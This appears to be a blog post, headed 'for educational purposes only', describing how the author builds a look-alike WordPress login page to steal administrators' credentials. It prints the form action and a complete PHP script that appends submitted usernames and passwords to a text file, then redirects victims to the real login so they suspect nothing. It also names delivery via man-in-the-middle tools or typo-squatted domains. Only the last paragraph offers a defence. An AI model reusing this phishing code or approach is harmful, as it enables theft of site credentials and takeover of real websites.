This is For Educational Purposes Only.  

WordPress controls approximately 60% of the Content Management System (CMS) market.  The majority of the websites we develop and manage are running WordPress.  With 60% of the market running a single product, it makes a lot of sense to focus attacks on WordPress.  Odds are pretty good you'll be able to recycle work which is why I started thinking about how I would steal WordPress credentials.  


What is the difference between the two login prompts below?

  

The first is an actual login for a WordPress site and the second is a page I have hosted that will steal the WordPress credentials, dump the credentials into a text file on our server, and then redirect the user to the actual page where they can login.  The idea is that the user thinks they botched the login.  When it redirects and they are able to login, they are none the wiser.

Right off the bat, someone might say -- but I use SSL.  The doppelganger does as well.  Unless you're using an EV certificate, I've got that covered.  Also, I'm not sure that would even get noticed but it could and that's an argument for using an EV certificate.  I don't know many sites using them that aren't bigger businesses or someone taking credit cards.  Most sites are using plain Jane SSL certificates.  

How do we go about getting someone to our malicious site?  Man-in-middle with with Responder. a Pineapple, or any other method along those lines.  Or how about a typo-squatted domain?  Regardless of how it's done, it looks the same and the main difference is our POST which looks like this:

<form name="loginform" id="loginform" action="savecreds.php" method="POST">

savecreds.php looks like this:

<?php
if(isset($_POST['username']) && isset($_POST['password'])) {
$data = $_POST['username'] . ' : ' . $_POST['password'] . "\n";
$ret = file_put_contents('./mydata.txt', $data, FILE_APPEND | LOCK_EX);
if($ret === false) {
header( 'Location: https://www.victimdomain.com/wp-login.php' ) ;
}
else {
header( 'Location: https://www.victimdomain.com/wp-login.php' ) ;
}
}
else {
header( 'Location: https://www.victimdomain.com/wp-login.php' ) ;
}

[Btw, I'm not saying the above is safe. Letting people write to a file on your server could negatively impact you.]

And then finally, you just need a file titled "mydata.txt"

How do you stop this attack?  The flaw in my design is that I'm looking for requests to the wp-login.php page.  If you move the WordPress login, and you should, you would get a 404 not found error.  At that point, you might see the typo in the URL or at the very least, be suspicious.  I could parse requests looking for something with the word "login" so maybe make the login page name something not so obvious.